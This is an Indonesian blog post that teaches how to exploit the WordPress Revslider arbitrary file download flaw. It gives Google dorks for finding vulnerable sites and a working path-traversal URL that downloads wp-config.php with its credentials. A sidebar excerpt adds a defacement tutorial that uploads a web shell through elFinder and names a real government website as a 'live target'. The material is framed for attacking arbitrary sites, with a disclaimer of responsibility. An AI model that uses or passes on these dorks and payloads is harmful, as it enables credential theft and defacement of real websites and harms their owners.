Skip to main content

Exploit Wordpress Revslider Arbritary File Download Vulnerability

Naufal Ardhani - Halo sobat kali ini saya akan membahas Exploit Wordpress Revslider Arbritary File Download pada exploit ini anda dapat mendownload file file penting yang ada di dalam server web tersebut khususnya web yang menggunakan cms Wordpress tapi tidak semua web yang menggunakan cms tersebut rentan dengan exploit ini.

Menurut hasil yang saya dapatkan dari Exploit DB exploit ini ditemukan oleh Claudio Viviani pada tahun 2014, ia merupakan pemilik blog https://www.homelab.it/ yang berisi tentang security.



Dork :

  • inurl:wp-content/plugins/revslider/
  • inurl:revslider
  • inurl:revslider_admin.php
  • inurl:revslider_front.php
  • inurl:plugins/revslider/
  • intext:Powered by Revslider
  • intitle:"Index Of/ revslider"
  • intitle:"Index Of/wp-content/themes/revslider"
  • intitle:"Index Of/wp-content/plugins/revslider"
  • intitle:"Index Of/admin/revslider"
  • intitle:"Index Of/fr/revslider"
  • intitle:"Index Of/en/revslider"
  • intitle:"Index Of/us/revslider"
  • intitle:"Index Of/ar/revslider"
  • intitle:"Index Of/es/revslider"
  • intitle:"Index Of/de/revslider"
Exploit :
  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Step :
  1. Dorking dengan dork yang sudah disediakan.
  2. Disini saya sudah memiliki target yang vuln/rentan tinggal kasih exploit, contoh : http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  3. Dan jika berhasil admin-ajax.php terdownload lalu buka dengan text editor.

Sekian saja Exploit Wordpress Revslider Arbitary File Download Vulnerability yang saya bagikan semoga bermanfaat dan saya tidak bertanggung atas apa yang anda lakukan terimakasih.
Labels:

Comments

Post a Comment

Popular posts from this blog

Benner Online Shop CDR / Toko Online Elegan CDR 100% Free

Benner Online Shop/ Toko Online Elegan 100% Free - Bagi anda yang memiliki toko online/online shop dan bingung untuk membuat bennernya, disini kami sajikan contoh benner online shop. benner online shope yang kami bagikan ini adalah benner yang di desain tim desainer kami untuk anda. contoh ini dapat menjadi referensi. dan jika anda membutuhkan file CDRnya anda dapat mengunduhnya pada link yang admin buat di akhir artikel ini. setelah anda mengunduh file CDRnya silahkan di edit sesuai nama online shop anda dengan menggunkan CorelDraw. Sesuai dengan judul yaitu Benner Online Shop/ Toko Online Elegan CDR 100% Free bahwa kami membagikannya secara gratis. jadi bagi yang berminat silahkan di download. berikut adalah contoh benner online shop yang kami maksud. Contoh 1 benner online Shop Contoh 2 benner online Shop    Contoh 3 benner online Shop Itulah contoh benner online shop yang dapat kami bagikan, kami berharap contoh diatas dapat mewakili kebutuhan anda. jika anda ingin re...
Post a Comment
Read more

Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema

Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema Written by Muhamad Hamdan on Wen March 5th 2014 Assalamu'Alaikum Sahabat Semua,Dua Minggu yang lalu kita pernah Membikin Artikel bagaimana cara Memperbaiki Missing required field "updated" Dan hCard "author" Mereka yang telah melihat artikel tadi pasti sudah valid kalau Dia mengikuti petunjuknya,Tetapi walaupun itu sudah valid untuk menggunakan rich snippets untuk google webmasters tools, Sebagian besar suka menemukan Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema di karenakan dari kesalahan property yang bukan schema markup. Nah sekarang untuk melanjutkan dengan cara Memperbaiki Error Page Contains Property "BlogId" And "postID" Is Not Part Of Schema Anda perlu bantuan d...
Post a Comment
Read more

Tutorial Deface elFinder + Upload Shell

Naufal Ardhani - Hallo gaess kali ini gua bakal bagiin  Tutorial Deface elFinder + Upload Shell , Exploit ini sudah cukup lama ya tapi masih ada aja website yang masih vuln dengan exploit ini :v dan pas gua lagi Pentest web  http://labuankec.pandeglangkab.go.id/  gua nemuin directory /elFinder/ dan langsung aja gua upload shell dan bugnya dah ditambel. Dork : inurl:elfinder/elfinder.php.html ( dork kembangin lagi ya biar dapet yang vuln ) Exploit : www.site.com/[path] /elfinder/elfinder.php.html Live Target :  http://labuankec.pandeglangkab.go.id/ Step : Dorking di google, pilih target dan kasih exploit satu satu dan Disini gua pake Live Target dan beri exploitnya : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts /elfinder/elfinder.php.html Langsung aja Upload Shell dengan ekstensi .phtml  lalu Akses deh Shellnya di www.site.com/[path] /elfinder/files/oxy.phtml Sekian Tutorial Deface elFinder + Upload Shell semoga bermanfaat ilmunya. nb : saya ...
Post a Comment
Read more